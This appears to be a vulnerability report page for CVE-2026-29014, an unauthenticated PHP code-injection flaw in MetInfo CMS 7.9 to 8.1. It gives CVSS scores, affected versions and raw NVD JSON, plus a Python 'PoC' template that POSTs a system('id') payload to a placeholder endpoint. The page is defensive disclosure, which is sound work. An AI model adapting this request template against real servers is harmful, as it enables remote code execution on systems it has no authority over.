Security Vulnerability Report
CVE-2026-29014 CVSS 9.8 CRITICAL

CVE-2026-29014

Published: 2026-04-01 13:16:35
Last Modified: 2026-04-07 20:38:52

Description

MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server.

CVSS Details

CVSS Score (v3.1; the raw record below also lists a CVSS 4.0 base score of 9.3)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:7.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:metinfo:metinfo:8.1:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 7.9
MetInfo CMS 8.0
MetInfo CMS 8.1

PoC / Exploit Code

⚠ For Security Research Only
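The following code is for security research and authorized testing only. It is a generic request template: the parameter name and endpoint URL in it are placeholders, so it shows the shape of a request rather than a working reproduction of CVE-2026-29014.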
python
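import requests

# PoC for MetInfo CMS Unauthenticated PHP Code Injection (CVE-2026-29014)
# Target: MetInfo CMS 7.9, 8.0, 8.1
# Description: Sends a malicious payload to execute arbitrary PHP code.
#
# NOTE(review): as written this is a generic request template. The form field
# name and the endpoint URL are placeholders rather than details of the real
# flaw, so a run of this script neither confirms nor rules out that a host is
# affected. Use the installed MetInfo version (7.9, 8.0, 8.1) for triage.


def exploit(target_url):
    """POST the template payload to ``target_url`` and print the outcome.

    Args:
        target_url: Full URL the form-encoded POST request is sent to.

    Returns:
        None. The result is reported on stdout only.

    Any ``requests.exceptions.RequestException`` (connection error, timeout,
    invalid URL, ...) is caught and printed instead of being propagated.
    """
    # The specific vulnerable parameter might vary based on the exact vulnerability analysis.
    # This is a generic template assuming a parameter injection scenario.
    payload = {
        # Fixed: the original used a C-style `//` comment here, which is a
        # syntax error in Python and stopped the script from parsing.
        "vulnerable_param": "system('id');"  # Example command to execute
    }
    # The User-Agent is a fixed string, so requests sent by this script are
    # straightforward to find in web-server access logs.
    headers = {
        "User-Agent": "CVE-2026-29014-Scanner"
    }

    try:
        print(f"[*] Sending payload to {target_url}...")
        # timeout=10 keeps an unresponsive host from blocking the script.
        response = requests.post(target_url, data=payload, headers=headers, timeout=10)

        # A 200 status only shows that the server answered the request; it is
        # not evidence that the payload was evaluated. The body still has to
        # be read to draw any conclusion.
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for command output.")
            print(response.text[:500])  # Print first 500 chars of response
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint URL
    url = "http://target-site.com/vulnerable_endpoint.php"
    exploit(url)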

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29014", "sourceIdentifier": "[email protected]", "published": "2026-04-01T13:16:35.063", "lastModified": "2026-04-07T20:38:52.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:7.9:*:*:*:*:*:*:*", "matchCriteriaId": "29AFA237-D322-4E9B-9D46-2EC80F113B29"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}, {"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "0C64ACF0-643B-41D1-872B-1D5AB470FB9C"}]}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2026-06", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.metinfo.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/metinfo-cms-unauthenticated-php-code-injection-rce", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "http://seclists.org/fulldisclosure/2026/Apr/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://websec.net/blog/cve-2026-29014-metinfo-cms-unauthenticated-php-code-injection-69cdc290c14a8a99e1f91b7a", "source": 
"af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}